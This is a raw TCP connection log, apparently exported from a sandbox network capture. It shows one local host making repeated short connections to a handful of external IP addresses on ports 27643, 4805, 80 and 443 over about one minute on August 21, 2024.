                                      Aug 21, 2024 10:58:59.104687929 CEST44360026162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:58:59.595479965 CEST276436002545.142.215.47192.168.2.4
                                      Aug 21, 2024 10:58:59.595551014 CEST6002527643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:58:59.595792055 CEST6002527643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:58:59.599638939 CEST44360026162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:58:59.601172924 CEST60026443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:58:59.601200104 CEST44360026162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:58:59.741954088 CEST44360026162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:58:59.742008924 CEST44360026162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:58:59.742080927 CEST60026443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:58:59.742533922 CEST60026443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:58:59.852045059 CEST480560023135.181.129.119192.168.2.4
                                      Aug 21, 2024 10:58:59.852128029 CEST600234805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:58:59.852530956 CEST600234805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:59:02.352307081 CEST6002480192.168.2.445.9.20.13
                                      Aug 21, 2024 10:59:02.355298042 CEST6002780192.168.2.445.9.20.13
                                      Aug 21, 2024 10:59:02.360116005 CEST806002745.9.20.13192.168.2.4
                                      Aug 21, 2024 10:59:02.360208988 CEST6002780192.168.2.445.9.20.13
                                      Aug 21, 2024 10:59:02.360569954 CEST6002780192.168.2.445.9.20.13
                                      Aug 21, 2024 10:59:02.365362883 CEST806002745.9.20.13192.168.2.4
                                      Aug 21, 2024 10:59:04.629401922 CEST6002827643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:59:04.741039038 CEST276436002845.142.215.47192.168.2.4
                                      Aug 21, 2024 10:59:04.741116047 CEST6002827643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:59:04.741811037 CEST6002827643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:59:04.746833086 CEST276436002845.142.215.47192.168.2.4
                                      Aug 21, 2024 10:59:04.760190010 CEST60029443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:59:04.760225058 CEST44360029162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:59:04.760294914 CEST60029443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:59:04.760746956 CEST60029443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:59:04.760757923 CEST44360029162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:59:04.870168924 CEST600304805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:59:04.875158072 CEST480560030135.181.129.119192.168.2.4
                                      Aug 21, 2024 10:59:04.875443935 CEST600304805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:59:04.880147934 CEST600304805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:59:04.885108948 CEST480560030135.181.129.119192.168.2.4
                                      Aug 21, 2024 10:59:05.243050098 CEST44360029162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:59:05.248317003 CEST60029443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:59:05.248333931 CEST44360029162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:59:05.397342920 CEST44360029162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:59:05.397411108 CEST44360029162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:59:05.398025990 CEST60029443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:59:05.398452997 CEST60029443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:59:05.558904886 CEST276436002845.142.215.47192.168.2.4
                                      Aug 21, 2024 10:59:05.558990955 CEST6002827643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:59:05.559464931 CEST6002827643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:59:06.304542065 CEST8059977188.40.141.211192.168.2.4
                                      Aug 21, 2024 10:59:06.304619074 CEST5997780192.168.2.4188.40.141.211
                                      Aug 21, 2024 10:59:06.304816961 CEST5997780192.168.2.4188.40.141.211
                                      Aug 21, 2024 10:59:06.309578896 CEST8059977188.40.141.211192.168.2.4
                                      Aug 21, 2024 10:59:06.398216963 CEST6002780192.168.2.445.9.20.13
                                      Aug 21, 2024 10:59:06.414736986 CEST6003180192.168.2.445.9.20.13
                                      Aug 21, 2024 10:59:06.419576883 CEST806003145.9.20.13192.168.2.4
                                      Aug 21, 2024 10:59:06.419652939 CEST6003180192.168.2.445.9.20.13
                                      Aug 21, 2024 10:59:06.421536922 CEST6003180192.168.2.445.9.20.13
                                      Aug 21, 2024 10:59:06.426282883 CEST806003145.9.20.13192.168.2.4
                                      Aug 21, 2024 10:59:06.582381964 CEST480560030135.181.129.119192.168.2.4
                                      Aug 21, 2024 10:59:06.582540035 CEST600304805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:59:06.582977057 CEST600304805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:59:10.399950981 CEST60032443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:59:10.399991035 CEST44360032162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:59:10.400068998 CEST60032443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:59:10.400346041 CEST60032443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:59:10.400360107 CEST44360032162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:59:10.430870056 CEST6003180192.168.2.445.9.20.13
                                      Aug 21, 2024 10:59:10.434236050 CEST6003380192.168.2.445.9.20.13
                                      Aug 21, 2024 10:59:10.572133064 CEST6003427643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:59:10.582475901 CEST806003345.9.20.13192.168.2.4
                                      Aug 21, 2024 10:59:10.582489967 CEST276436003445.142.215.47192.168.2.4
                                      Aug 21, 2024 10:59:10.582652092 CEST6003427643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:59:10.582653046 CEST6003380192.168.2.445.9.20.13
                                      Aug 21, 2024 10:59:10.582823992 CEST6003427643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:59:10.583111048 CEST6003380192.168.2.445.9.20.13
                                      Aug 21, 2024 10:59:10.587568045 CEST276436003445.142.215.47192.168.2.4
                                      Aug 21, 2024 10:59:10.587977886 CEST806003345.9.20.13192.168.2.4
                                      Aug 21, 2024 10:59:11.068237066 CEST44360032162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:59:11.069880962 CEST60032443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:59:11.069907904 CEST44360032162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:59:11.224685907 CEST44360032162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:59:11.224751949 CEST44360032162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:59:11.224833012 CEST60032443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:59:11.225353956 CEST60032443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:59:11.423238039 CEST276436003445.142.215.47192.168.2.4
                                      Aug 21, 2024 10:59:11.423324108 CEST6003427643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:59:11.423588037 CEST6003427643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:59:11.587943077 CEST600354805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:59:11.592860937 CEST480560035135.181.129.119192.168.2.4
                                      Aug 21, 2024 10:59:11.593893051 CEST600354805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:59:11.594129086 CEST600354805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:59:11.598937988 CEST480560035135.181.129.119192.168.2.4
                                      Aug 21, 2024 10:59:13.305614948 CEST480560035135.181.129.119192.168.2.4
                                      Aug 21, 2024 10:59:13.307259083 CEST600354805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:59:13.307429075 CEST600354805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:59:14.587627888 CEST6003380192.168.2.445.9.20.13
                                      Aug 21, 2024 10:59:14.590934038 CEST6003680192.168.2.445.9.20.13
                                      Aug 21, 2024 10:59:14.595771074 CEST806003645.9.20.13192.168.2.4
                                      Aug 21, 2024 10:59:14.595896959 CEST6003680192.168.2.445.9.20.13
                                      Aug 21, 2024 10:59:14.596736908 CEST6003680192.168.2.445.9.20.13
                                      Aug 21, 2024 10:59:14.601512909 CEST806003645.9.20.13192.168.2.4
                                      Aug 21, 2024 10:59:16.238353014 CEST60037443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:59:16.238405943 CEST44360037162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:59:16.238478899 CEST60037443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:59:16.238800049 CEST60037443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:59:16.238816977 CEST44360037162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:59:16.433995008 CEST6003827643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:59:16.439004898 CEST276436003845.142.215.47192.168.2.4
                                      Aug 21, 2024 10:59:16.439161062 CEST6003827643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:59:16.439418077 CEST6003827643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:59:16.444282055 CEST276436003845.142.215.47192.168.2.4
                                      Aug 21, 2024 10:59:16.707581997 CEST44360037162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:59:16.708739996 CEST60037443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:59:16.708766937 CEST44360037162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:59:16.845415115 CEST44360037162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:59:16.845485926 CEST44360037162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:59:16.845582008 CEST60037443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:59:16.846024990 CEST60037443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:59:17.369283915 CEST276436003845.142.215.47192.168.2.4
                                      Aug 21, 2024 10:59:17.369370937 CEST6003827643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:59:17.369586945 CEST6003827643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:59:18.323381901 CEST600394805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:59:18.328290939 CEST480560039135.181.129.119192.168.2.4
                                      Aug 21, 2024 10:59:18.328766108 CEST600394805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:59:18.329083920 CEST600394805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:59:18.334646940 CEST480560039135.181.129.119192.168.2.4
                                      Aug 21, 2024 10:59:18.602447987 CEST6003680192.168.2.445.9.20.13
                                      Aug 21, 2024 10:59:18.606488943 CEST6004080192.168.2.445.9.20.13
                                      Aug 21, 2024 10:59:18.611802101 CEST806004045.9.20.13192.168.2.4
                                      Aug 21, 2024 10:59:18.612714052 CEST6004080192.168.2.445.9.20.13
                                      Aug 21, 2024 10:59:18.615184069 CEST6004080192.168.2.445.9.20.13
                                      Aug 21, 2024 10:59:18.621870041 CEST806004045.9.20.13192.168.2.4
                                      Aug 21, 2024 10:59:20.038769007 CEST480560039135.181.129.119192.168.2.4
                                      Aug 21, 2024 10:59:20.038856983 CEST600394805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:59:20.039084911 CEST600394805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:59:20.277961969 CEST480560039135.181.129.119192.168.2.4
                                      Aug 21, 2024 10:59:20.279225111 CEST600394805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:59:21.855278969 CEST60041443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:59:21.855321884 CEST44360041162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:59:21.855412960 CEST60041443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:59:21.855753899 CEST60041443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:59:21.855767012 CEST44360041162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:59:22.333355904 CEST44360041162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:59:22.337089062 CEST60041443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:59:22.337112904 CEST44360041162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:59:22.385514021 CEST6004227643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:59:22.390362024 CEST276436004245.142.215.47192.168.2.4
                                      Aug 21, 2024 10:59:22.391257048 CEST6004227643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:59:22.391525984 CEST6004227643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:59:22.396315098 CEST276436004245.142.215.47192.168.2.4
                                      Aug 21, 2024 10:59:22.484874010 CEST44360041162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:59:22.484932899 CEST44360041162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:59:22.485009909 CEST60041443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:59:22.485855103 CEST60041443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:59:22.618762970 CEST6004080192.168.2.445.9.20.13
                                      Aug 21, 2024 10:59:22.627300978 CEST6004380192.168.2.445.9.20.13
                                      Aug 21, 2024 10:59:22.632210016 CEST806004345.9.20.13192.168.2.4
                                      Aug 21, 2024 10:59:22.632323027 CEST6004380192.168.2.445.9.20.13
                                      Aug 21, 2024 10:59:22.632713079 CEST6004380192.168.2.445.9.20.13
                                      Aug 21, 2024 10:59:22.637554884 CEST806004345.9.20.13192.168.2.4
                                      Aug 21, 2024 10:59:23.242227077 CEST276436004245.142.215.47192.168.2.4
                                      Aug 21, 2024 10:59:23.242306948 CEST6004227643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:59:23.242710114 CEST6004227643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:59:25.057440042 CEST600444805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:59:25.062488079 CEST480560044135.181.129.119192.168.2.4
                                      Aug 21, 2024 10:59:25.063297987 CEST600444805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:59:25.063883066 CEST600444805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:59:25.068707943 CEST480560044135.181.129.119192.168.2.4
                                      Aug 21, 2024 10:59:26.633655071 CEST6004380192.168.2.445.9.20.13
                                      Aug 21, 2024 10:59:26.636774063 CEST6004580192.168.2.445.9.20.13
                                      Aug 21, 2024 10:59:26.641661882 CEST806004545.9.20.13192.168.2.4
                                      Aug 21, 2024 10:59:26.641767979 CEST6004580192.168.2.445.9.20.13
                                      Aug 21, 2024 10:59:26.641937017 CEST6004580192.168.2.445.9.20.13
                                      Aug 21, 2024 10:59:26.646806955 CEST806004545.9.20.13192.168.2.4
                                      Aug 21, 2024 10:59:26.788219929 CEST480560044135.181.129.119192.168.2.4
                                      Aug 21, 2024 10:59:26.788330078 CEST600444805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:59:26.788580894 CEST600444805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:59:27.493582010 CEST60046443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:59:27.493618965 CEST44360046162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:59:27.493736029 CEST60046443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:59:27.494013071 CEST60046443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:59:27.494033098 CEST44360046162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:59:27.981358051 CEST44360046162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:59:27.983114958 CEST60046443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:59:27.983129025 CEST44360046162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:59:28.129079103 CEST44360046162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:59:28.129162073 CEST44360046162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:59:28.129266024 CEST60046443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:59:28.129643917 CEST60046443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:59:28.260411978 CEST6004727643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:59:28.265295982 CEST276436004745.142.215.47192.168.2.4
                                      Aug 21, 2024 10:59:28.265543938 CEST6004727643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:59:28.265672922 CEST6004727643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:59:28.270767927 CEST276436004745.142.215.47192.168.2.4
                                      Aug 21, 2024 10:59:29.085850000 CEST276436004745.142.215.47192.168.2.4
                                      Aug 21, 2024 10:59:29.086555004 CEST6004727643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:59:29.086815119 CEST6004727643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:59:30.660917997 CEST6004580192.168.2.445.9.20.13
                                      Aug 21, 2024 10:59:30.683459044 CEST6004880192.168.2.445.9.20.13
                                      Aug 21, 2024 10:59:31.004609108 CEST806004845.9.20.13192.168.2.4
                                      Aug 21, 2024 10:59:31.005274057 CEST6004880192.168.2.445.9.20.13
                                      Aug 21, 2024 10:59:31.010417938 CEST6004880192.168.2.445.9.20.13
                                      Aug 21, 2024 10:59:31.015825987 CEST806004845.9.20.13192.168.2.4
                                      Aug 21, 2024 10:59:31.792146921 CEST600494805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:59:31.850790024 CEST480560049135.181.129.119192.168.2.4
                                      Aug 21, 2024 10:59:31.850897074 CEST600494805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:59:31.851191044 CEST600494805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:59:31.856178045 CEST480560049135.181.129.119192.168.2.4
                                      Aug 21, 2024 10:59:33.134303093 CEST60050443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:59:33.134346008 CEST44360050162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:59:33.134494066 CEST60050443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:59:33.134701014 CEST60050443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:59:33.134716034 CEST44360050162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:59:33.554282904 CEST480560049135.181.129.119192.168.2.4
                                      Aug 21, 2024 10:59:33.554364920 CEST600494805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:59:33.554661036 CEST600494805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:59:33.599553108 CEST44360050162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:59:33.602505922 CEST60050443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:59:33.602524996 CEST44360050162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:59:33.745687962 CEST44360050162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:59:33.745764971 CEST44360050162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:59:33.745822906 CEST60050443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:59:33.746284008 CEST60050443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:59:34.106190920 CEST6005127643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:59:34.111279011 CEST276436005145.142.215.47192.168.2.4
                                      Aug 21, 2024 10:59:34.113084078 CEST6005127643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:59:34.113904953 CEST6005127643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:59:34.118664026 CEST276436005145.142.215.47192.168.2.4
                                      Aug 21, 2024 10:59:34.941169977 CEST276436005145.142.215.47192.168.2.4
                                      Aug 21, 2024 10:59:34.941226959 CEST6005127643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:59:34.941572905 CEST6005127643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:59:35.024805069 CEST6004880192.168.2.445.9.20.13
                                      Aug 21, 2024 10:59:35.030981064 CEST6005280192.168.2.445.9.20.13
                                      Aug 21, 2024 10:59:35.035968065 CEST806005245.9.20.13192.168.2.4
                                      Aug 21, 2024 10:59:35.036073923 CEST6005280192.168.2.445.9.20.13
                                      Aug 21, 2024 10:59:35.036703110 CEST6005280192.168.2.445.9.20.13
                                      Aug 21, 2024 10:59:35.042880058 CEST806005245.9.20.13192.168.2.4
                                      Aug 21, 2024 10:59:38.557849884 CEST600534805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:59:38.562693119 CEST480560053135.181.129.119192.168.2.4
                                      Aug 21, 2024 10:59:38.563304901 CEST600534805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:59:38.563556910 CEST600534805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:59:38.568315983 CEST480560053135.181.129.119192.168.2.4
                                      Aug 21, 2024 10:59:38.760745049 CEST60054443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:59:38.760782957 CEST44360054162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:59:38.760853052 CEST60054443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:59:38.761413097 CEST60054443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:59:38.761429071 CEST44360054162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:59:39.132180929 CEST6005280192.168.2.445.9.20.13
                                      Aug 21, 2024 10:59:39.169303894 CEST6005580192.168.2.445.9.20.13
                                      Aug 21, 2024 10:59:39.174190998 CEST806005545.9.20.13192.168.2.4
                                      Aug 21, 2024 10:59:39.178244114 CEST6005580192.168.2.445.9.20.13
                                      Aug 21, 2024 10:59:39.182205915 CEST6005580192.168.2.445.9.20.13
                                      Aug 21, 2024 10:59:39.187022924 CEST806005545.9.20.13192.168.2.4
                                      Aug 21, 2024 10:59:39.252649069 CEST44360054162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:59:39.253897905 CEST60054443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:59:39.253930092 CEST44360054162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:59:39.386362076 CEST44360054162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:59:39.386425018 CEST44360054162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:59:39.386512995 CEST60054443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:59:39.387341976 CEST60054443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:59:39.948266983 CEST6005627643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:59:39.953201056 CEST276436005645.142.215.47192.168.2.4
                                      Aug 21, 2024 10:59:39.955461979 CEST6005627643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:59:39.955493927 CEST6005627643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:59:39.960369110 CEST276436005645.142.215.47192.168.2.4
                                      Aug 21, 2024 10:59:40.445848942 CEST480560053135.181.129.119192.168.2.4
                                      Aug 21, 2024 10:59:40.446115017 CEST600534805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:59:40.446521997 CEST600534805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:59:40.781040907 CEST276436005645.142.215.47192.168.2.4
                                      Aug 21, 2024 10:59:40.781438112 CEST6005627643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:59:40.781568050 CEST6005627643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:59:43.196400881 CEST6005580192.168.2.445.9.20.13
                                      Aug 21, 2024 10:59:43.203114986 CEST6005780192.168.2.445.9.20.13
                                      Aug 21, 2024 10:59:43.209642887 CEST806005745.9.20.13192.168.2.4
                                      Aug 21, 2024 10:59:43.209760904 CEST6005780192.168.2.445.9.20.13
                                      Aug 21, 2024 10:59:43.212670088 CEST6005780192.168.2.445.9.20.13
                                      Aug 21, 2024 10:59:43.217509031 CEST806005745.9.20.13192.168.2.4
                                      Aug 21, 2024 10:59:44.403706074 CEST60058443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:59:44.403753996 CEST44360058162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:59:44.403984070 CEST60058443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:59:44.404326916 CEST60058443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:59:44.404341936 CEST44360058162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:59:44.902261019 CEST44360058162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:59:44.903455973 CEST60058443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:59:44.903486967 CEST44360058162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:59:45.053332090 CEST44360058162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:59:45.053405046 CEST44360058162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:59:45.053539038 CEST60058443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:59:45.054155111 CEST60058443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:59:45.463296890 CEST600594805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:59:45.678067923 CEST480560059135.181.129.119192.168.2.4
                                      Aug 21, 2024 10:59:45.678154945 CEST600594805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:59:45.678692102 CEST600594805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:59:45.683523893 CEST480560059135.181.129.119192.168.2.4
                                      Aug 21, 2024 10:59:45.791548967 CEST6006027643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:59:45.796411037 CEST276436006045.142.215.47192.168.2.4
                                      Aug 21, 2024 10:59:45.796503067 CEST6006027643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:59:45.796799898 CEST6006027643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:59:45.803147078 CEST276436006045.142.215.47192.168.2.4
                                      Aug 21, 2024 10:59:46.622867107 CEST276436006045.142.215.47192.168.2.4
                                      Aug 21, 2024 10:59:46.623024940 CEST6006027643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:59:46.623174906 CEST6006027643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:59:47.213151932 CEST6005780192.168.2.445.9.20.13
                                      Aug 21, 2024 10:59:47.224504948 CEST6006180192.168.2.445.9.20.13
                                      Aug 21, 2024 10:59:47.229434013 CEST806006145.9.20.13192.168.2.4
                                      Aug 21, 2024 10:59:47.229525089 CEST6006180192.168.2.445.9.20.13
                                      Aug 21, 2024 10:59:47.230123997 CEST6006180192.168.2.445.9.20.13
                                      Aug 21, 2024 10:59:47.234957933 CEST806006145.9.20.13192.168.2.4
                                      Aug 21, 2024 10:59:47.378330946 CEST480560059135.181.129.119192.168.2.4
                                      Aug 21, 2024 10:59:47.379283905 CEST600594805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:59:47.379518032 CEST600594805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:59:50.056277037 CEST60062443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:59:50.056313992 CEST44360062162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:59:50.056512117 CEST60062443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:59:50.056721926 CEST60062443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:59:50.056735039 CEST44360062162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:59:50.532679081 CEST44360062162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:59:50.533987045 CEST60062443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:59:50.534008026 CEST44360062162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:59:50.692766905 CEST44360062162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:59:50.692836046 CEST44360062162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:59:50.692898989 CEST60062443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:59:50.693494081 CEST60062443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:59:51.243221045 CEST6006180192.168.2.445.9.20.13
                                      Aug 21, 2024 10:59:51.246967077 CEST6006380192.168.2.445.9.20.13
                                      Aug 21, 2024 10:59:51.251890898 CEST806006345.9.20.13192.168.2.4
                                      Aug 21, 2024 10:59:51.251966000 CEST6006380192.168.2.445.9.20.13
                                      Aug 21, 2024 10:59:51.252470970 CEST6006380192.168.2.445.9.20.13
                                      Aug 21, 2024 10:59:51.257280111 CEST806006345.9.20.13192.168.2.4
                                      Aug 21, 2024 10:59:51.634769917 CEST6006427643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:59:51.639759064 CEST276436006445.142.215.47192.168.2.4
                                      Aug 21, 2024 10:59:51.641479015 CEST6006427643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:59:51.641721010 CEST6006427643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:59:51.646512985 CEST276436006445.142.215.47192.168.2.4
                                      Aug 21, 2024 10:59:52.385037899 CEST600654805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:59:52.391580105 CEST480560065135.181.129.119192.168.2.4
                                      Aug 21, 2024 10:59:52.392471075 CEST600654805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:59:52.393034935 CEST600654805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:59:52.397886038 CEST480560065135.181.129.119192.168.2.4
                                      Aug 21, 2024 10:59:52.478357077 CEST276436006445.142.215.47192.168.2.4
                                      Aug 21, 2024 10:59:52.481573105 CEST6006427643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:59:52.481699944 CEST6006427643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:59:54.082586050 CEST480560065135.181.129.119192.168.2.4
                                      Aug 21, 2024 10:59:54.082761049 CEST600654805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:59:54.082978010 CEST600654805192.168.2.4135.181.129.119
